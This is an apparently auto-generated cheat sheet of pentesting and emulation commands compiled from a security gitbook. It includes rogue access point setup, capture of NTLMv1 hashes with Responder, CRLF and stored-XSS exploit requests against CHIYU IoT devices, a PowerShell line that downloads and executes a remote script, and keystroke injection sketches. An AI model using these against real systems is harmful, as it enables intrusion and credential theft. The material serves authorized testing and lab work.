### Install OpenSCAP on CentOS Source: https://gitbook.seguranca-informatica.pt/cheat-sheet-1/hardening Installs the necessary OpenSCAP packages on CentOS systems, including the OpenSCAP framework, utility tools, and the SCAP Security Guide content. This is a prerequisite for running security compliance scans. ```bash sudo yum -y install openscap openscap-utils scap-security-guide ``` -------------------------------- ### Start VPN Connection Source: https://gitbook.seguranca-informatica.pt/tools/infrastructure-and-network/active-directory/burpsuite-with-kerberos-auth Initiates a VPN connection using openfortivpn. Requires username, password, and a trusted certificate. The '--insecure-ssl' flag bypasses SSL certificate verification, which may have security implications. ```bash sudo openfortivpn -u -p 'password' --insecure-ssl --trusted-cert 4a11xxxxxxxbc -v ``` -------------------------------- ### Install Active Directory Domain Services (PowerShell) Source: https://gitbook.seguranca-informatica.pt/tools/infrastructure-and-network/active-directory This PowerShell command installs Active Directory Domain Services to create a new forest. It requires administrative privileges and specifies domain details like name, mode, and DNS delegation settings. Ensure the paths for the database and log files are valid. ```powershell # if you didn't install Active Directory yet , you can try Install-ADDSForest -CreateDnsDelegation:$false -DatabasePath "C:\\Windows\\NTDS" -DomainMode "7" -DomainName "cs.org" -DomainNetbiosName "cs" -ForestMode "7" -InstallDns:$true -LogPath "C:\\Windows\\NTDS" -NoRebootOnCompletion:$false -SysvolPath "C:\\Windows\\SYSVOL" -Force:$true ``` -------------------------------- ### Install and Configure hostapd with berate-ap Source: https://gitbook.seguranca-informatica.pt/pwnage/wifi/rogue-app This section shows how to install and use the 'berate-ap' utility, which is likely a wrapper or component related to hostapd for setting up an access point. It requires specifying the wireless and ethernet interfaces, SSID, and passphrase. ```bash sudo apt install berate-ap ``` ```bash sudo berate_ap wlan0 eth0 MyAccessPoint MyPassPhrase ``` -------------------------------- ### Eaphammer Configuration Examples Source: https://gitbook.seguranca-informatica.pt/pwnage/wifi/rogue-app These commands demonstrate how to use eaphammer to set up rogue access points with various authentication methods and ESSIDs. Eaphammer is a tool for creating rogue APs that can intercept EAP authentication. ```bash sudo ./eaphammer -e XX-Guest -c 6 --hw-mode g --auth wpa-psk --wpa-passphrase letmein12345 --wpa-version 2 -i wlan0 ``` ```bash ./eaphammer -i wlan0 --channel 6 --auth wpa-eap --essid SecureWireless ``` -------------------------------- ### Install and Use CPVNP CheckPoint VPN Client Source: https://gitbook.seguranca-informatica.pt/tools/infrastructure-and-network/misc Clones the CPVNP repository, installs the client using pip, and then demonstrates how to connect to a CheckPoint VPN endpoint using the client. Requires Python and pip. ```bash git clone https://gitlab.com/cpvpn/cpyvpn.git cd cpvpn pip install . /home/kali/.local/bin/cp_client https://endpoint -m l -u 'user' -p 'pwd' ``` -------------------------------- ### Install Passionfruit for IPA Decryption (Shell) Source: https://gitbook.seguranca-informatica.pt/mobile/reverse-ios-ipa/resources Installs and runs Passionfruit, a tool used for decrypting IPA files. It requires Node.js and npm. The command sets the npm user to root before global installation. ```shell ## mobexler VM ## npm_config_user=root npm install -g passionfruit passionfruit ``` -------------------------------- ### Install and Run Prowler for Azure Security Assessment Source: https://gitbook.seguranca-informatica.pt/tools/infrastructure-and-network/cloud-and-azure This snippet demonstrates how to install Prowler, a security assessment tool, and configure it to run against Azure resources. It includes setting up a virtual environment, installing the package, and executing the command with necessary tenant information. ```bash python3 -m venv venv source venv\bin\activate pip install prowler prowler azure --browser-auth --tenant-id xxxxxxxxxxxx prowler dashboard ``` -------------------------------- ### Android Frida Trace Script Examples Source: https://gitbook.seguranca-informatica.pt/mobile/resources Demonstrates how to use the 'trace' function from Raptor scripts in an Android Frida environment. It shows examples of tracing specific methods, classes, or patterns, including a workaround for ClassNotFoundException. ```javascript // usage examples setTimeout(function() { // avoid java.lang.ClassNotFoundException Java.perform(function() { // trace("com.target.utils.CryptoUtils.decrypt"); // trace("com.target.utils.CryptoUtils"); // trace("CryptoUtils"); // trace(/crypto/i); // trace("exports:*!open*"); }); }, 0 ``` -------------------------------- ### iOS Frida Enum Script Examples Source: https://gitbook.seguranca-informatica.pt/mobile/resources Demonstrates enumeration functionalities in an iOS Frida environment, provided the Objective-C runtime is available. It includes examples for listing all classes, finding classes by pattern, enumerating methods in a class, listing all methods, and finding methods matching a pattern. ```javascript // usage examples if (ObjC.available) { // enumerate all classes /* var a = enumAllClasses(); a.forEach(function(s) { console.log(s); }); */ // find classes that match a pattern /* var a = findClasses(/password/i); a.forEach(function(s) { console.log(s); }); */ // enumerate all methods in a class /* var a = enumMethods("PasswordManager") a.forEach(function(s) { console.log(s); }); */ // enumerate all methods /* var d = enumAllMethods(); for (k in d) { console.log(k); d[k].forEach(function(s) { console.log(" " + s); }); } */ // find methods that match a pattern /* var d = findMethods(/password/i); for (k in d) { console.log(k); d[k].forEach(function(s) { console.log(" " + s); }); } */ } else { send("error: Objective-C Runtime is not available!"); } ``` -------------------------------- ### Install Hostapd-WPE Dependencies Source: https://gitbook.seguranca-informatica.pt/pwnage/wifi/hostapd-wpe Installs necessary development libraries and tools required to compile and run Hostapd-WPE. This includes SSL development files, nl80211 utilities, pkg-config, SQLite, and build essentials. ```bash apt-get install libssl-dev libnl-genl-3-dev libnl-3-dev pkg-config libsqlite3-dev build-essential wget --no-install-recommends ``` -------------------------------- ### Android Frida Enum Script Examples Source: https://gitbook.seguranca-informatica.pt/mobile/resources Provides examples of using enumeration functions from Raptor scripts in an Android Frida environment. It covers tracing all classes, finding classes by pattern, and enumerating methods within a specific class. ```javascript // usage examples setTimeout(function() { // avoid java.lang.ClassNotFoundException Java.perform(function() { // enumerate all classes /* var a = enumAllClasses(); a.forEach(function(s) { console.log(s); }); */ // find classes that match a pattern /* var a = findClasses(/password/i); a.forEach(function(s) { console.log(s); }); */ // enumerate all methods in a class /* var a = enumMethods("com.target.app.PasswordManager") a.forEach(function(s) { console.log(s); }); */ }); }, 0); ``` -------------------------------- ### iOS Frida Trace Script Examples Source: https://gitbook.seguranca-informatica.pt/mobile/resources Illustrates how to utilize the 'trace' function within an iOS Frida environment, contingent on the Objective-C runtime being available. Examples show tracing specific Objective-C methods, methods matching patterns, and exported functions from libraries. ```javascript // usage examples if (ObjC.available) { // trace("-[CredManager setPassword:]"); // trace("*[CredManager *]"); // trace("*[* *Password:*]"); // trace("exports:libSystem.B.dylib!CCCrypt"); // trace("exports:libSystem.B.dylib!open"); // trace("exports:*!open*"); } else { send("error: Objective-C Runtime is not available!"); } ``` -------------------------------- ### SQLmap Basic Usage Source: https://gitbook.seguranca-informatica.pt/cheat-sheet-1/web/sql-injection Demonstrates the fundamental command for initiating SQLmap scans against a target URL. This is the starting point when the vulnerability is unknown. ```bash sqlmap -u “https://target_site.com/page/” ``` -------------------------------- ### Unicode and Hex Encoding Examples for XSS Source: https://gitbook.seguranca-informatica.pt/cheat-sheet-1/web/xss Demonstrates various ways to encode characters using Unicode and Hexadecimal representations within script tags to potentially bypass filters. Includes examples of direct Unicode, Unicode with braces, and Hexadecimal encoding. ```html ``` -------------------------------- ### LinEnum.sh Privilege Escalation Script Source: https://gitbook.seguranca-informatica.pt/tools/privilege-escalation Example of how to run LinEnum.sh, a Linux privilege escalation script. It includes options for searching for keywords, generating reports, and specifying temporary directories. ```bash /LinEnum.sh -s -k keyword -r report -e /tmp/ -t ``` -------------------------------- ### Buildroot and QEMU Quick Setup for Custom Linux Source: https://gitbook.seguranca-informatica.pt/arm/tools/qemu-101 This snippet outlines the steps to quickly set up a custom Linux environment using Buildroot and QEMU. It involves downloading a Buildroot version, configuring it for QEMU ARM versatile, and launching the emulator. This is a faster approach compared to manual compilation for specific hardware targets. ```bash get buildroot version from the official website $ tar -xvzf buildroot-2021.xxx.tar.gz $ cd buildroot/ $ make qemu_arm_versatile_defconfig $ make menuconfig $ qemu-system-arm -M versatilepb -kernel output/images/zImage -dtb output/images/versatile-pb.dtb -drive file=output/images/rootfs.ext2,if=scsi -append "root=/dev/sda console=ttyAMA0,115200" -nographic ``` -------------------------------- ### Add Frida Repository to Cydia Source: https://gitbook.seguranca-informatica.pt/mobile/reverse-ios-ipa/install-frida-iphone-5s-%2B-ios-11 These steps guide the user to add the official Frida repository to Cydia on their jailbroken iOS device, allowing them to install Frida packages. ```bash Start `Cydia` and navigate to the `Sources` Page. Click `Edit` in the top right corner, then `Add` in the top left. Enter `https://build.frida.re` aand click `Add Source`. ``` -------------------------------- ### Compile ARM Kernel and Execute with QEMU using Buildroot Source: https://gitbook.seguranca-informatica.pt/arm/tools/qemu-101 This snippet details the process of setting up Buildroot, compiling an ARM kernel, and running it with QEMU. It includes package installations, Buildroot configuration, cross-compilation of a C program, filesystem mounting, and launching the QEMU emulator with specific machine and kernel configurations. It also covers copying files to the QEMU environment and transferring files using SCP. ```bash sudo apt-get install qemu-system-arm tar -xvzf buildroot-2020.02.3.tar.gz sudo apt-get install libncurses5-dev libncursesw5-dev make menuconfig make list-defconfigs make qemu_arm_versatile_defconfig export PATH=$PATH:/home/embeddedcraft/buildroot-2020.02.3/output/host/bin arm-buildroot-linux-uclibcgnueabi-gcc hello.c -o hello sudo mount -t ext2 -o rw,loop rootfs.ext2 /mnt/try sudo cp hello /mnt/try/root/ qemu-system-arm -M versatilepb -kernel vmlinuz-3.2.0-4-versatile -initrd initrd.img-3.2.0-4-versatile -hda debian_wheezy_armel_standard.qcow2 -append "root=/dev/sda1" -net nic -net user,hostfwd=tcp::7777-:22 tar zcf squashfs-root.tar.gz squashfs-root scp -P 7777 ./squashfs-root.tar.gz root@127.0.0.1:/root ``` -------------------------------- ### QEMU Emulation Setup for mipsel Debian Source: https://gitbook.seguranca-informatica.pt/arm/reverse-iot-devices/reverse-linkone-devices This snippet demonstrates the commands required to download a QEMU disk image and kernel for a mipsel Debian system, and then launch the QEMU emulator. It shows basic emulation and an advanced configuration with port forwarding for SSH access. ```bash wget https://people.debian.org/~aurel32/qemu/mipsel/debian_squeeze_mipsel_standard.qcow2 wget https://people.debian.org/~aurel32/qemu/mipsel/vmlinux-2.6.32-5-4kc-malta qemu-system-mipsel -M malta -kernel vmlinux-2.6.32-5-4kc-malta -hda debian_squeeze_mipsel_standard.qcow2 -append "root=/dev/sda1 console=tty0" qemu-system-mipsel -M malta -kernel vmlinux-2.6.32-5-4kc-malta -hda debian_squeeze_mipsel_standard.qcow2 -append "root=/dev/sda1 console=tty0" -net nic -net user,hostfwd=tcp::7777-:22 scp -P 7777 rootfs.tar.gz root@127.0.0.1:/root ssh -p 7777 root@127.0.0.1 ``` -------------------------------- ### Set up SMB Server with Impacket Source: https://gitbook.seguranca-informatica.pt/cve-and-exploits/privilege-escalation This command demonstrates how to start an SMB server using the `impacket-smbserver` tool. The server will share a local directory (specified by '.') and support SMBv2 protocol. It's used here to serve the DLL file to the target machine during the exploit. ```bash impacket-smbserver -smb2support dlls . ``` -------------------------------- ### QEMU Essential Commands for ARM Emulation Source: https://gitbook.seguranca-informatica.pt/arm/tools/qemu-101 This snippet showcases various QEMU commands for emulating ARM systems, focusing on different machine types, CPUs, and system configurations. It demonstrates how to specify kernel images, device trees, root filesystems, serial consoles, network interfaces, and drive configurations. These commands are crucial for setting up and debugging embedded Linux systems in QEMU. ```bash qemu-system-arm -machine help qemu-system-arm -machine vexpress -cpu help sudo qemu-system-arm \ -M vexpress-a9 \ -kernel ./zImage_arch \ -dtb ./vexpress-v2p-ca9.dtb \ --nographic \ -append "root=/dev/mmcblk0 rw roottype=ext4 console=ttyAMA0" \ -drive if=sd,driver=raw,cache=writeback,file=./arch_rootfs.ext4 \ -net nic,macaddr=$macaddr \ -net tap,vlan=0,ifname=tap0 \ -snapshot qemu-system-arm -M vexpress-a9 \ -cpu cortex-a9 \ -m 1024 \ -nographic \ -kernel $BRIMAGES/zImage \ -drive file=$BRIMAGES/rootfs.ext2,index=0,media=disk,format=raw,if=sd \ -dtb $BRIMAGES/vexpress-v2p-ca9.dtb \ -net nic \ -net user,hostfwd=tcp::2222-:22,hostfwd=tcp::9000-:9000 \ -append "rw console=ttyAMA0 console=tty root=/dev/mmcblk0" qemu-system-arm -M versatilepb -kernel vmlinuz-3.2.0-4-versatile -initrd initrd.img-3.2.0-4-versatile -hda debian_wheezy_armel_standard.qcow2 -append "root=/dev/sda1" -net nic -net user,hostfwd=tcp::7777-:22 qemu-system-arm -M versatilepb -kernel output/images/zImage -dtb output/images/versatile-pb.dtb -drive file=output/images/rootfs.ext2,if=scsi -append "root=/dev/sda console=ttyAMA0,115200" -nographic qemu-system-arm -M versatilepb -kernel zImage -dtb versatile-pb.dtb -drive file=rootfs.ext2,if=scsi,format=raw -append "root=/dev/sda console=ttyAMA0,115200" -serial stdio -net nic,model=rtl8139 -net user ``` -------------------------------- ### HTTP Request for CRLF Injection Exploit Source: https://gitbook.seguranca-informatica.pt/cve-and-exploits/cves/chiyu-iot-devices An example HTTP GET request demonstrating how to trigger a CRLF injection vulnerability in CHIYU devices by manipulating the 'redirect' parameter. This request aims to inject JavaScript. ```http GET /man.cgi?redirect=setting.htm%0d%0a%0d%0a&failure=fail.htm&type=dev_name_apply&http_block=0&TF_ip0=192&TF_ip1=168&TF_ip2=200&TF_ip3=200&TF_port=&TF_port=&B_mac_apply=APPLY HTTP/1.1 Host: 192.168.187.12 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://192.168.187.12/manage.htm Authorization: Basic OmFkbWlu Connection: close Upgrade-Insecure-Requests: 1 ``` -------------------------------- ### QEMU with Virtual Tap Networking Source: https://gitbook.seguranca-informatica.pt/arm/tools/qemu-101 This snippet demonstrates how to set up QEMU with a virtual tap interface for networking. It involves creating a bridge interface (virbr0), configuring its IP address, creating a tap device (tap0), assigning it an IP address, and adding it to the bridge. Finally, it shows how to launch QEMU with a MIPSEL architecture, connecting the tap0 interface to the QEMU network stack. ```bash sudo apt-get install bridge-utils uml-utilities sudo brctl addbr virbr0 sudo ifconfig virbr0 192.168.122.1/24 up sudo tunctl -t tap0 sudo ifconfig tap0 192.168.122.11/24 up sudo brctl addif virbr0 tap0 sudo qemu-system-mipsel -M malta -kernel vmlinux-3.2.0-4-4kc-malta -hda debian_wheezy_mipsel_standard.qcow2 -append "root=/dev/sda1 console=tty0" -net nic,vlan=0 -net tap,vlan=0,ifname=tap0 -nographic ifconfig eth0 192.168.122.12/24 up ``` -------------------------------- ### Run ARMv7 Firmware Emulation with Docker Source: https://gitbook.seguranca-informatica.pt/arm/reverse-iot-devices/reverse-asus-rt-ac5300 This snippet demonstrates how to pull a pre-built Docker image for ARMv7 emulation and run it with specific port mappings and privileged access. The commands execute the `preninit` script within the container, initiating the emulation environment. Ensure you have Docker installed and the necessary privileges. ```bash docker pull kelvinlawson/arm-cortex sudo docker run --privileged=true --name=firmware -p 2221:22 -p 8888:80 -p 4443:443 -p 2223:23 -it 8d319a850335 shell$: cd /sbin shell$: ./preninit ``` -------------------------------- ### OpenVPN Server Configuration: Pushing Routes to Clients Source: https://gitbook.seguranca-informatica.pt/lateral-movement-pivoting/from-windows-vpn-%2B-kali-vpn-%2B-dc Enables the server to push additional routes to clients, allowing them to access private subnets behind the server. This example demonstrates pushing routes for 192.168.10.0 and 192.168.20.0 networks. ```OpenVPN Configuration push "route 192.168.10.0 255.255.255.0" push "route 192.168.20.0 255.255.255.0" ``` -------------------------------- ### HTTP Request for Stored XSS Exploit Source: https://gitbook.seguranca-informatica.pt/cve-and-exploits/cves/chiyu-iot-devices An example HTTP GET request used to exploit a stored XSS vulnerability in CHIYU devices. The payload is inserted into the 'TF_submask' parameter within the 'if.cgi' component, aiming to execute JavaScript. ```http GET /if.cgi?redirect=setting.htm&failure=fail.htm&type=ap_tcps_apply&TF_ip=443&TF_submask=0&TF_submask=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E&radio_ping_block=0&max_tcp=3&B_apply=APPLY HTTP/1.1 Host: 192.168.187.12 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://192.168.187.12/ap_tcps.htm Authorization: Basic OmFkbWlu Connection: close Upgrade-Insecure-Requests: 1 ``` -------------------------------- ### Emulate and Chroot into Device Environment Source: https://gitbook.seguranca-informatica.pt/arm/reverse-iot-devices/reverse-linkone-devices Sets up a chroot environment to emulate the device's operating system using QEMU. This allows for running device-specific binaries and services within a controlled environment. It involves copying QEMU binaries and potentially loading custom libraries. ```bash cp /bin/qemu-mipsel-static . sudo chroot . ./qemu-mipsel-static /bin/sh wget https://github.com/firmadyne/libnvram/releases/download/v1.0/libnvram.so.mipsel export LD_PRELOAD=/firmadyne/libnvram.so httpd ``` -------------------------------- ### OpenVPN Server Configuration: Client-Specific Routing Source: https://gitbook.seguranca-informatica.pt/lateral-movement-pivoting/from-windows-vpn-%2B-kali-vpn-%2B-dc Configures client-specific routing using the 'ccd' directory to allow individual clients to access private subnets behind their connecting machines. This example shows how to route traffic for a specific client's subnet (192.168.40.128/255.255.255.248). ```OpenVPN Configuration client-config-dir ccd route 192.168.40.128 255.255.255.248 ``` ```OpenVPN Configuration # Create a file named ccd/Thelonious with: # iroute 192.168.40.128 255.255.255.248 ``` -------------------------------- ### Essential Buildroot Commands Source: https://gitbook.seguranca-informatica.pt/arm/tools/qemu-101 This snippet lists essential Buildroot commands for configuration and building. 'make menuconfig' allows for detailed system configuration, while 'make HOSTCC=gcc-4.4' and 'make MAKEINFO=true' can be used to specify host compiler and toolchain settings. 'make -j8' enables parallel compilation for faster build times. ```bash make menuconfig make HOSTCC=gcc-4.4 make MAKEINFO=true make -j8 ``` -------------------------------- ### Run PowerShell Script from URL for Vulnerable AD Source: https://gitbook.seguranca-informatica.pt/tools/infrastructure-and-network/active-directory This script downloads and executes a PowerShell script from a given URL to identify vulnerabilities in Active Directory. It requires the Active Directory to be already installed and configured. The script takes user limits and domain name as parameters. ```powershell IEX((new-object net.webclient).downloadstring("https://raw.githubusercontent.com/wazehell/vulnerable-AD/master/vulnad.ps1")); Invoke-VulnAD -UsersLimit 100 -DomainName "cs.org" ``` -------------------------------- ### AccessChk Usage Examples Source: https://gitbook.seguranca-informatica.pt/tools/privilege-escalation Demonstrates common use cases for the AccessChk utility, a Sysinternals tool for finding misconfigured services and file/directory permissions. It shows how to check default permissions, specific user/group access, and wildcard searches. ```bash accesschk.exe /accepteula accesschk "power users" c:\windows\system32 accesschk.exe -uwcqv "Authenticated Users" * accesschk.exe -uwqs Users c:\*.* accesschk.exe -uwqs "Authenticated Users" c:\*.* ``` -------------------------------- ### Manage Memcached with libmemcached-tools Source: https://gitbook.seguranca-informatica.pt/cheat-sheet-1/services-by-port/11211-phpmemcached This snippet shows how to use the libmemcached-tools suite for managing Memcached. It includes commands to get server statistics, dump all cached items, and retrieve specific item data by key. Ensure you have libmemcached-tools installed and replace '127.0.0.1' with the Memcached server's IP if it's not local. ```bash sudo apt install libmemcached-tools memcstat --servers=127.0.0.1 #Get stats memcdump --servers=127.0.0.1 #Get all items memccat --servers=127.0.0.1 #Get info inside the item(s ``` -------------------------------- ### QEMU with Port Forwarding for Network Access Source: https://gitbook.seguranca-informatica.pt/arm/tools/qemu-101 This snippet illustrates how to configure QEMU with port forwarding to access services running inside the emulated system from the host machine. It launches a QEMU MIPSEL instance and forwards host ports (e.g., 80, 443, 2222) to guest ports. This allows for direct access to web servers or SSH services running within the QEMU environment. ```bash sudo qemu-system-mipsel -M malta -kernel vmlinux-3.2.0-4-4kc-malta -hda debian_wheezy_mipsel_standard.qcow2 -append "root=/dev/sda1 console=tty0" -net user,hostfwd=tcp::80-:80,hostfwd=tcp::443-:443,hostfwd=tcp::2222-:22 -net nic -nographic ssh -p 2222 root@127.0.0.1 scp -r ./data root@192.168.122.12:/root/ ``` -------------------------------- ### Retrieve Memcached Keys using PHP Source: https://gitbook.seguranca-informatica.pt/cheat-sheet-1/services-by-port/11211-phpmemcached This PHP code snippet connects to a local Memcached instance and retrieves all available keys. It requires the 'php-memcached' extension to be installed. The output is a dump of the keys stored in the cache. Subsequent retrieval of item data would require using the 'get' command with a specific key. ```php sudo apt-get install php-memcached php -r '$c = new Memcached(); $c->addServer("localhost", 11211); var_dump( $c->getAllKeys() );' ``` -------------------------------- ### Open Web Page with ATtiny85 (Digispark) on Ubuntu Source: https://gitbook.seguranca-informatica.pt/pwnage/rubber-ducky This Arduino sketch for the Digispark board uses the DigiKeyboard library to simulate key presses for opening a terminal and launching Firefox with a specified URL on an Ubuntu system. Ensure the Digispark board support is installed in the Arduino IDE. ```c++ #include "DigiKeyboard.h" void setup() { // This delay gives you time to switch focus to the target machine DigiKeyboard.delay(5000); // Open Terminal using the shortcut Ctrl+Alt+T DigiKeyboard.sendKeyStroke(KEY_T, MOD_CONTROL_LEFT | MOD_ALT_LEFT); DigiKeyboard.delay(1000); // Type the command to open Firefox // The 'firefox &' command should be the same, but you might need to adjust based on the keyboard layout DigiKeyboard.print("firefox xxxxx.pt"); DigiKeyboard.sendKeyStroke(KEY_ENTER); } void loop() { // The loop function is empty since the task is completed in setup() } ``` -------------------------------- ### Start Responder for NTLMv1 Hash Capture Source: https://gitbook.seguranca-informatica.pt/active-directory-cheat-sheet/from-dfscoercer-to-da Initiates the Responder tool to capture NTLMv1 hashes. The --disable-ess and --lm flags are used to ensure the capture of NTLMv1 hashes without Security Support Provider (SSP), which is crucial for subsequent downgrade attacks. ```bash sudo python3 /usr/share/responder/Responder.py -I eth0 -w --disable-ess --lm ``` -------------------------------- ### Install Frida using pip (Python) Source: https://gitbook.seguranca-informatica.pt/mobile/reverse-ios-ipa/install-frida-iphone-5s-%2B-ios-11 This snippet demonstrates how to install a specific version of Frida using pip. It includes uninstalling any existing versions before installing the desired one and verifying the installation. ```bash pip uninstall frida pip install frida==14.2.13 frida --version ``` -------------------------------- ### Mounting Shares and Chrooting into Emulated System Source: https://gitbook.seguranca-informatica.pt/arm/reverse-iot-devices/reverse-linkone-devices This snippet provides the commands to mount necessary virtual file systems (proc and dev) and then use chroot to enter the emulated system's root file system, allowing for modifications within the emulated environment. ```bash mount -t proc /proc ./roofs/proc mount -o bind /dev ./rootfs/dev chroot ./roofs/ sh ``` -------------------------------- ### Install IPA Installer via SSH Source: https://gitbook.seguranca-informatica.pt/mobile/reverse-ios-ipa/install-frida-iphone-5s-%2B-ios-11 This command is executed on the iPhone via SSH to list installed applications. This is a prerequisite for spawning applications with Frida. ```bash iphone:~ root# ipainstaller -l ``` -------------------------------- ### Emulate fopen using LD_PRELOAD in C Source: https://gitbook.seguranca-informatica.pt/arm/reverse-iot-devices/reverse-asus-rt-ac5300 This C code snippet demonstrates how to hook the standard 'fopen' function using LD_PRELOAD. It defines a custom 'fopen' function that logs the call and then invokes the real 'fopen' using dlsym. The __attribute__((constructor)) ensures the 'setup' function runs before main. ```c #define _GNU_SOURCE #include #include typedef FILE *(*fopen_t)(const char *pathname, const char *mode); FILE *real_fopen; FILE *fopen(const char *pathname, const char *mode) { fprintf(stderr, "called fopen(%s, %s)\n", pathname, mode); return real_fopen(pathname, mode); } __attribute__((constructor)) static void setup(void) { real_fopen = dlsym(RTLD_NEXT, "fopen"); fprintf(stderr, "called setup()\n"); } ``` -------------------------------- ### Modifying Startup Script for Web Server in QEMU Source: https://gitbook.seguranca-informatica.pt/arm/reverse-iot-devices/reverse-linkone-devices This snippet shows how to modify the rcS startup script within the QEMU SSH shell to launch an HTTP server with specific debugger and verbose options, pointing to custom authentication and route files. After modification, the script needs to be executed. ```bash httpd & # becomes httpd --debugger --verbose --home /webroot/ --auth /var/auth.txt --route /var/route.txt 127.0.0.1 80 & # After that, execute your file **./rcS** ``` -------------------------------- ### Install and Use Radamsa Fuzzer Source: https://gitbook.seguranca-informatica.pt/tools/infrastructure-and-network/misc Installs Radamsa from source, compiles, and installs it. Then, it demonstrates basic usage by piping a string into Radamsa to generate fuzzed output. ```bash git clone https://gitlab.com/akihe/radamsa.git && cd radamsa && make && sudo make install echo "HAL 9000" | radamsa ``` -------------------------------- ### Open Web Page with ATMEGA32U4 (Arduino Leonardo) on Ubuntu Source: https://gitbook.seguranca-informatica.pt/pwnage/rubber-ducky This Arduino sketch uses the Keyboard library to simulate key presses for opening a terminal and launching Firefox with a specified URL on an Ubuntu system. It requires the Arduino IDE and the Keyboard library. ```c++ #include void setup() { // Begin the keyboard Keyboard.begin(); // This delay gives you time to switch focus to the target machine delay(5000); // Open Terminal using the shortcut Ctrl+Alt+T Keyboard.press(KEY_LEFT_CTRL); Keyboard.press(KEY_LEFT_ALT); Keyboard.press('t'); delay(100); // Wait for key press to register Keyboard.releaseAll(); delay(1000); // Wait for the terminal to open // Type the command to open Firefox Keyboard.print("firefox xxxx.pt"); Keyboard.press(KEY_RETURN); delay(100); // Wait for key press to register Keyboard.releaseAll(); } void loop() { // The loop function is empty since the task is completed in setup() } ``` -------------------------------- ### Compile and Install Hostapd-WPE Source: https://gitbook.seguranca-informatica.pt/pwnage/wifi/hostapd-wpe Compiles the Hostapd source code with the WPE patch applied and installs it. The 'make wpe' command specifically builds the WPE (Wireless Penetration Exploitation) module. ```bash make make install make wpe ``` -------------------------------- ### SQLmap GET Parameter Testing Source: https://gitbook.seguranca-informatica.pt/cheat-sheet-1/web/sql-injection Shows how to instruct SQLmap to test all GET request parameters for SQL injection vulnerabilities. Useful when the vulnerable parameter is not explicitly known. ```bash sqlmap -u “https://target_site.com/page?p1=value1&p2=value2” ``` -------------------------------- ### Connect and Enumerate Domains with rpcclient Source: https://gitbook.seguranca-informatica.pt/cheat-sheet-1/services-by-port/135-rpc Connects to a target IP address using RPC and enumerates domain information. Requires the 'rpcclient' utility. Outputs domain names and related information. ```bash $ rpcclient 10.10.10.40 -U guest Enter WORKGROUP\guest's password: rpcclient $> enumdomains querydominfo ``` -------------------------------- ### SQLmap Basic Authentication Source: https://gitbook.seguranca-informatica.pt/cheat-sheet-1/web/sql-injection Illustrates how to use SQLmap to test sites protected by basic HTTP authentication. Requires specifying the authentication type and credentials. ```bash sqlmap -u “https://target_site.com/page/” --data="p1=value1&p2=value2" --auth-type=basic --auth-cred=username:password ``` -------------------------------- ### Install Proxychains-ng from Source (Shell) Source: https://gitbook.seguranca-informatica.pt/tools/infrastructure-and-network/misc Clones the Proxychains-ng repository from GitHub, compiles, and installs it. This ensures the latest version with support for IP exclusions is used, which is crucial for EyeWitness to function with certain proxies. ```shell git clone https://github.com/rofl0r/proxychains-ng ~/proxychains-ng cd ~/proxychains-ng make -s clean ./configure --prefix=/usr --sysconfdir=/etc make -s make -s install ln -sf /usr/bin/proxychains4 /usr/local/bin/proxychains-ng ``` -------------------------------- ### Send Keystrokes with NRF Source: https://gitbook.seguranca-informatica.pt/pwnage/nrf This snippet demonstrates sending a sequence of keystrokes using NRF for keyboard injection. It simulates typing 'Hello World!' into a program, starting with opening notepad. The commands include delays, GUI commands, and string inputs, designed to be executed via an NRF-compatible device. ```text DELAY 500 GUI r DELAY 500 STRING notepad.exe ENTER DELAY 1000 STRING Hello World! ``` -------------------------------- ### Download and Install Frida Gadget for iOS Source: https://gitbook.seguranca-informatica.pt/mobile/reverse-ios-ipa/install-frida-iphone-5s-%2B-ios-11 This sequence downloads the Frida Gadget for iOS, unzips it, and places it in the expected cache directory for Frida to use when attaching to jailed iOS applications. ```bash wget https://github.com/frida/frida/releases/download/14.2.13/frida-gadget-14.2.13-ios-universal.dylib.gz gunzip frida-gadget-14.2.13-ios-universal.dylib.gz mkdir -p ~/.cache/frida cp frida-gadget-14.2.13-ios-universal.dylib ~/.cache/frida/gadget-ios.dylib ``` -------------------------------- ### List available SCAP checklists Source: https://gitbook.seguranca-informatica.pt/cheat-sheet-1/hardening Lists all available XCCDF checklist files within the SCAP Security Guide content directory. These files define security policies and profiles for various systems and standards. ```bash ls /usr/share/xml/scap/ssg/content/ | grep xccdf ``` -------------------------------- ### Prepare NTLMv1 Hash for Cracking with ntlmv1.py Source: https://gitbook.seguranca-informatica.pt/active-directory-cheat-sheet/from-dfscoercer-to-da This script processes a captured NTLMv1 hash, splitting it into its constituent parts (hostname, username, LM response, NT response, client challenge, SRV challenge). It also provides guidance on calculating the final NTLM hash characters and preparing data for hashcat. ```python python3 ntlmv1.py --ntlmv1 "hashcat::DUSTIN-5AA37877:85D5BC2CE95161CD00000000000000000000000000000000:892F905962F76D323837F613F88DE27C2BBD6C9ABCD021D0:1122334455667788" ```